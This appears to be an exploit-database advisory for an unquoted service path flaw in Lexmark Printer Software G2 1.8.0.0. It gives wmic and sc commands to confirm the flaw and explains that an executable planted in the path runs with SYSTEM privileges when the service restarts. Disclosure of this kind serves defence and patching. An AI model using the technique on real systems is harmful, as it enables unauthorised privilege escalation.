38 lines
No EOL
1.6 KiB
Text
38 lines
No EOL
1.6 KiB
Text
# Exploit Title: Lexmark Printer Software G2 Installation Package 1.8.0.0 - 'LM__bdsvc' Unquoted Service Path
|
|
# Date: 2021-06-20
|
|
# Exploit Author: Julio Aviña
|
|
# Vendor Homepage: https://www.lexmark.com/
|
|
# Software Link: https://downloads.lexmark.com/downloads/drivers/Lexmark_Printer_Software_G2_Installation_Package_01292021.exe
|
|
# Version: 1.8.0.0
|
|
# Tested on: Windows 10 Pro x64 es
|
|
# Vulnerability Type: Unquoted Service Path
|
|
|
|
|
|
# 1. To find the unquoted service path vulnerability
|
|
|
|
C:\>wmic service where 'name like "%LM__bdsvc%"' get displayname, pathname, startmode, startname
|
|
|
|
DisplayName PathName StartMode StartName
|
|
Lexmark Communication System C:\Program Files\Lexmark\Bidi\LM__bdsvc.exe Auto LocalSystem
|
|
|
|
# 2. To check service info:
|
|
|
|
C:\>sc qc "LM__bdsvc"
|
|
[SC] QueryServiceConfig CORRECTO
|
|
|
|
NOMBRE_SERVICIO: LM__bdsvc
|
|
TIPO : 110 WIN32_OWN_PROCESS (interactive)
|
|
TIPO_INICIO : 2 AUTO_START
|
|
CONTROL_ERROR : 1 NORMAL
|
|
NOMBRE_RUTA_BINARIO: C:\Program Files\Lexmark\Bidi\LM__bdsvc.exe
|
|
GRUPO_ORDEN_CARGA :
|
|
ETIQUETA : 0
|
|
NOMBRE_MOSTRAR : Lexmark Communication System
|
|
DEPENDENCIAS :
|
|
NOMBRE_INICIO_SERVICIO: LocalSystem
|
|
|
|
|
|
# 3. Exploit:
|
|
|
|
A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application.
|
|
When restarting the service or the system, the inserted executable will run with elevated privileges. |